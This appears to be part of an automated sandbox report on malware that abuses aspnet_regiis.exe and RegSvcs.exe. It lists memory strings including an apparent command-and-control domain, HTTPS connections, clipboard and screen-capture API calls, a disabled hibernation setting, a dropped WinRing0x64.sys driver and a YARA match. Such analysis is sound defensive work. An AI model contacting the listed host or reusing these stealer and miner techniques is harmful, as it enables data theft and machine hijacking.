                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000008.00000003.1619368845.0000000004E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000008.00000003.1619368845.0000000004E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tamedgeesy.sbs/
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tamedgeesy.sbs/a
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463623078.0000000002E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tamedgeesy.sbs/api
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463623078.0000000002E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tamedgeesy.sbs/apiY
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tamedgeesy.sbs/apis
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1463623078.0000000002E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tamedgeesy.sbs/apiz
                Source: aspnet_regiis.exe, 00000007.00000003.1463509140.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tamedgeesy.sbs/h
                Source: aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002454000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000021.00000002.1979634479.000000000244F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: aspnet_regiis.exe, 00000007.00000003.1527742549.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527538113.00000000056D9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530696295.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530957968.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: aspnet_regiis.exe, 00000008.00000003.1619768349.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: aspnet_regiis.exe, 00000008.00000003.1619368845.0000000004E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: aspnet_regiis.exe, 00000008.00000003.1619368845.0000000004E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: aspnet_regiis.exe, 00000007.00000003.1647915784.00000000057C7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1619368845.0000000004E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000008.00000003.1619368845.0000000004E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000007.00000003.1647915784.00000000057C7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1619368845.0000000004E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499145366.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499336300.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1479804802.0000000002923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498907075.0000000002929000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.0000000002994000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506823031.000000000298E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000003.1506903568.0000000002907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49794 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49793 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49802 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49803 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49814 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49816 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49818 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49835 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49839 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49867 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49883 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49887 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49903 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49904 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49914 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49915 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49926 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49934 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49945 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49994 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7708DDA0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_7708DDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7708DDA0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_7708DDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7708E2DC GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,8_2_7708E2DC

                System Summary

                barindex
                Source: 0000001F.00000002.1911910899.00000000004CA000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: Process Memory Space: Installer.exe PID: 4952, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: file.bin.11.drZip Entry: encrypted
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 77060000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 77060000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 77060000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sys
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A87_3_02EC51A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51A47_3_02EC51A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC51957_3_02EC5195
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC56A17_3_02EC56A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 7_3_02EC57BC7_3_02EC57BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77070F348_2_77070F34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7706B6208_2_7706B620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7706DEA68_2_7706DEA6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7707C5308_2_7707C530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770715508_2_77071550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77092DA08_2_77092DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709CDA08_2_7709CDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770955F08_2_770955F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709D5F08_2_7709D5F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770704498_2_77070449
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77086C5A8_2_77086C5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77092A408_2_77092A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7708725D8_2_7708725D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77080AE18_2_77080AE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7706B1108_2_7706B110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770811508_2_77081150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770699908_2_77069990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770688F08_2_770688F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7707A7008_2_7707A700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77080F058_2_77080F05
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770857108_2_77085710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770667208_2_77066720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7708D7508_2_7708D750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77081F608_2_77081F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770847678_2_77084767
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7707E7788_2_7707E778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7707479D8_2_7707479D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709B7A08_2_7709B7A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709BFA08_2_7709BFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770817D58_2_770817D5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770816008_2_77081600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709A6108_2_7709A610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77063E708_2_77063E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709AEA08_2_7709AEA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770676C08_2_770676C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770695108_2_77069510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770745908_2_77074590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770795D08_2_770795D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7707EDF08_2_7707EDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7707FC1B8_2_7707FC1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709A4508_2_7709A450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770834908_2_77083490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770634B08_2_770634B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709BCB08_2_7709BCB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77073CC08_2_77073CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770934F08_2_770934F0
